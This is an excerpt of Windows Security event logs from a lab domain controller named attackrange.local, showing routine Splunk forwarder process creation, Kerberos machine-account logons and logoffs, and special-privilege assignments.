Account Domain: ATTACKRANGE
Logon ID: 0x84B54C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:28:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264668
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1540
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264670
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264669
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264671
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1944
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264672
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1964
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264674
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1834
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264673
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:28:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264677
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84EFC3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:28:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264676
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84EFC3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53577
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:28:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264675
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84EFC3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264689
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84F8FA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264688
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84F9E8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264687
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84FA30
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264686
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84FAAC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53583
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264685
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84FAAC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264684
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84FA30
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53582
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264683
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84FA30
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264682
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84F9E8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264681
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84F9E8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264680
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84F8FA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53581
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264679
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84F8FA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:29:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264678
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264691
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1858
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264690
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1698
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264692
Keywords=Audit Success
